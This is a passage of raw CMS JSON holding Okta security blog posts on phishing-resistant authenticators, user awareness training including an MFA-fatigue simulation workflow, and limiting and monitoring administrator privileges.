\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/datasheet-factor-assurance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"numerous authenticators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" an Okta administrator can choose from to satisfy those properties in access policies. A spate of successful social engineering attacks has renewed interest in the degree to which any given authenticator is “phishing resistant”. But what exactly is \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"phishing resistance\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Measuring resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing resistance can be viewed in relative or absolute terms. All authenticators offer \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/datasheet-factor-assurance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"varying degrees of resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to social engineering, as all authenticators impose costs and risks on adversaries seeking to take over an account. For example, Push authenticators offer greater resistance to static credential phishing campaigns than authenticators that rely on One Time Passwords (OTP).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Combining Push with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-okta-verify-options.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Number Challenge\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which asks the user verifying a push request to identify a number presented on the sign-in page, offers resistance to a broader set of adversary techniques including \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/everythingisyes\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"“MFA Fatigue” attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But usually when somebody says “phishing resistant”, they are defining it in absolute terms and referring to authenticators that can withstand \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/sessioncookietheft\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"real-time, AiTM phishing attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". This narrows the number of authentication choices significantly.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most reliable definition for phishing resistance is maintained by the US National Institute of Standards and Technology (NIST). According to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-FAQ/#q-b04\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", phishing resistance requires that the channel being authenticated is cryptographically bound to the output of the authenticator. In more simple terms, this means that the domain (address) of the website you are signing in to is tied to your authenticator, to ensure it won't issue your credentials to a fake phishing web page.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Several authenticators available in Okta’s platform meet this definition. Okta supports roaming FIDO2 WebAuthn authenticators (security keys) and device-bound FIDO2 WebAuthn authenticators (e.g. FaceID, TouchID, Windows Hello) and also supports the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/08/okta-helps-federal-agencies-deploy-phishing-resistant-mfa/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"use of PIV smart cards as an “external IdP”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Depending on your deployment model, FastPass (Okta’s device-bound passwordless authenticator) also meets this definition.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But given the rate of change in operating systems, browsers and apps (not to mention the constant evolution of adversary tradecraft), it shouldn’t be left to administrators to work out what authentication flows are more or less resistant to phishing. That’s why Okta Identity Engine provides administrators the ability to create application assurance policies that can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"enforce\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" phishing resistance.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5ggBWDlzYV6gcq9ZqQvNqc\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the policy above, for example, access to a particular set of applications is only allowed from a managed device using at least one authenticator that meets the NIST definition for phishing resistance. Over 1.5m Okta users have enrolled in phishing resistant authenticators like WebAuthN today. Early adopters like Figma have \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://twitter.com/frgx/status/1379504541666701313?s=20&t=c41cs60uEK5ReCa71dTnzw\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"rolled out\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" phishing resistant authenticators across their workforce.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Defense in depth\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Irrespective of your authenticator, your access policies should assume there will be scenarios in which a phishing resistant authenticator isn’t available for a given application or for a given user. That’s why we recommend a defense-in-depth approach to phishing prevention, including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security awareness programs\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" that teach users how to: Identify the emotive cues social engineers use to pressure users into acting abruptly; Identify suspicious variations on domains used in phishing websites; Report suspicious messages, websites or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"access requests\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to security teams.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Email and web filtering technologies\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" that can identify and prevent employees from clicking on phishing emails or connecting to phishing websites.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Endpoint security software\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to protect against malware infection and identify browser-based attacks in which malware is hosted on phishing websites.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication policies\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" that limit access to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/network/network-zones.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"trusted networks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/guides/devices/devcontext-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"trusted devices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", with maximum and idle session durations based on the criticality of the application. NIST’s Authenticator Assurance Levels are a good guide:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AAL1 applications 30 days maximum\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AAL2 applications: 12 hours maximum AND 30 minutes idle\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AAL3 applications: 12 hours maximum AND 15 minutes idle\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection and response\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" programs that proactively identify phishing websites, identify anomalous login activities and provide an ability to respond to phishing campaigns in-flight.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We will provide more details on how Okta features can be incorporated into your security awareness and detection and response programs in later blog posts in this series.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:38:56.695Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2022/10/human-factor-phishing-resistance","id":"ee1329b1-31e3-5601-986e-3b641d8c3a2d","title":"The Human Factor in Phishing Resistance","date":"2022-10-05T20:23:27+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the wake of recent security events at Uber and Twilio, organizations are understandably interested in \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"pivoting to authenticators\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that offer the most resistance to phishing attacks. In this second part of our series on phishing resistance, we consider the human element.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All organizations should aspire to a state in which technical and operational controls reduce the burden on end users to identify and respond appropriately to social engineering.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Large numbers of Okta customers are pivoting toward phishing resistant authenticators, as we discussed \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"in part one\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of this series. Many Okta customers have chosen to limit all user authentication to phishing resistant factors. Typically these are leading edge organizations, “born in the cloud”, that are not locked into legacy technologies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s mission is to enable anyone to use any technology. So we recognize that, by necessity, organizations encumbered by legacy apps will need to support a mix of authenticators for some time into the future. Our policy engine is designed such that these organizations can enforce phishing resistance where it matters most, and only allow weaker (less phishing resistant) authenticators by exception.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So for most organizations, there remains a need to empower users in the fight against phishing. User empowerment can take many forms, including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Providing users with sufficient context whenever they sign-in\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ensuring users are aware of common social engineering techniques\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Providing users with the tools to report suspicious requests\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The power of context\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/scatterswine\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Scatter Swine attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of July and August 2022 demonstrated one of the critical limitations in authentication flows that use passwords and OTP (one time password) authenticators. An authentication flow that requires an OTP doesn’t provide opportunities for the user to assess context about the origin of a request.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A push request can provide this context. Depending on your configuration, an Okta Verify Push request displays a range of information including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The recorded location of the browser making the request\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The recorded device making the request\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine admins can also add further context to each request using a feature now available in Early Access. This adds to each Push request:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"the name of the application requested, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"the sign-in URL.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Crucially, if the organization enables Number Challenge (which can be applied to all Push notifications, or only for risky sign-ins), the user also has to verify a random number presented on the sign-in widget.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"475lwmyyqMduuCsDAVhabo\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Verify Push with Number Challenge\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All of this context can help users identify when an attacker attempts to use stolen credentials to access their account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The power of training\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To be effective, users need to be aware of what this context means. That’s where security awareness training comes in. As I’ve \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://symantec-enterprise-blogs.security.com/blogs/feature-stories/5-must-have-elements-include-your-security-awareness-program\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"previously opined\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", learners are more likely to retain and apply advice if it is provided in the context of their daily work, and where opportunities are provided for strong, positive habits to form.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Historically, security awareness training has appropriately focused on the areas of the most heightened risk: password hygiene. Given the increasing prevalence and effectiveness of multi-factor authentication, there is also value in training users about the methods an attacker armed with stolen credentials might employ when attempting to bypass MFA challenges.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most common social engineering techniques we have observed, and some corresponding learning outcomes to target for your security awareness training, are included in the table below:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1cdIkKOCHlERWGsujFO1MO\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sample Learning Outcomes\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Introducing \\\"Push Bomb\\\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Push Bomb\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is an example of a learning experience that can be used to raise user awareness about Push Fatigue attacks and teaches them how to assess the context of a Push notification.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Push Bomb\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is a proof of concept Okta Workflow developed by Solution Engineer Marc Miller that schedules unsolicited push notifications to a defined group of users to test whether they accept, reject or ignore the request. It provides users a first-hand experience of an MFA Fatigue attack, just as phishing simulations do for credential phishing campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Marc's Workflow (which is not an Okta supported product) does all of the following at the push of a button:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Selects a random percentage of users from a defined Okta Group(s) to test according to an admin-defined schedule;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Leverages the Okta Factors API to check whether each user is enrolled in Push MFA\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sends a Verify push notification to users and polls for the results at admin-defined intervals, logging whether the user accepts, rejects or ignores the request.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sends the user a message on Slack, Teams or email (customer configurable) to confirm they were subject to the test, and offers further guidance based on user actions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prepares a detailed summary report of results for the admin.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"43AlESspXjG6oTOkvNF9wM\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An End User Notification delivered by the Push Bomb Workflow\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The power of positive reporting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most important learning outcome, irrespective of the attacker’s methods, is that users are well practiced in alerting the security team about suspicious behavior via channels that are well monitored.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One way for users to develop this muscle memory is via phishing simulations. While the focus of these drills can often lean too heavily into identifying “at-risk” users, the most crucial learning outcome is for users to learn how to quickly report suspicious activity to the right place in both simulated and real-world attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating easy methods of reporting suspicious activity is critical. \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Reporting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" allows Okta admins to configure their org to email a user whenever their account is accessed from a new device, when a new authenticator (factor) is enrolled or when an existing one is reset. Admins can optionally provide the user a one-click path to reporting a suspicious event from the body of the same email.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Just as training and awareness programs need to anticipate the potential bypass of technical controls, your detection and response capability needs to anticipate that users will fail to recognize or act on social engineering attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The next post in this series on phishing resistance will focus on how to use Okta System Log to detect phishing-related events.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-11T20:34:05.479Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/leastprivilege","id":"9d58bcd8-f61c-566a-a401-43cf9c82d4f7","title":"Monitoring for Abuse of Administrative Privileges","date":"2022-10-25T05:34:21+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"All applications require a highly-privileged administrator role to deploy and maintain that application. The monitoring and oversight (audit) of actions performed by users with these roles is a cornerstone of any well-designed security program.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A number of research projects have highlighted ways in which the most privileged administrators in Okta could, if unchecked, abuse their privilege in some way. These research efforts serve to reinforce some long-held security principles: most notably the principle of “least privilege,” that a user or application should only have the permissions required to perform a specific role or function, and the principle of governance, where those responsible for holding privileged access are held to account for their actions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below we’ve presented some best practice advice on limiting, securing and monitoring administrative access to Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Constrain Privileged Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/healthinsight/healthinsight-security-task-recomendations.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta HealthInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is a tool that prompts administrators to address misconfigurations or conditions identified in their Okta tenant (“org”). One HealthInsight reminder recommends limiting the number of highly privileged roles (“SuperAdmins”) in any given org.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The SuperAdmin role grants its user full privileges to all the powerful administrative capabilities Okta makes available to its customers. A SuperAdmin can manage users, policies, applications and administrative permissions and set org-level security configurations. Every new Okta org is provisioned an account with the ‘SuperAdmin’ role, and the SuperAdmin has the ability to create other admin roles using this account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As our colleague Gurinder Bhatti recently \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/SuperAdmin-Best-Practices\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"blogged\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", with great power comes great responsibility. The majority of tasks an Okta administrator needs to perform do not require SuperAdmin access. For this reason, there are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/administrators-admin-comparison.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"eight other standard admin roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in every Okta org that can be used to constrain administrator access. Your help desk admin doesn’t need the same rights as the admin that manages API access, for example.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As customer implementations of Okta grow larger and more complex, it creates a requirement to further align administrative capabilities with an individual’s role. To support this need, Okta developed \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to allow organizations to set even more granular permissions within a role. So your helpdesk admin might, for example, only be granted permissions relevant to users within a specific functional unit (organization or group), a specific set of duties or specific applications and 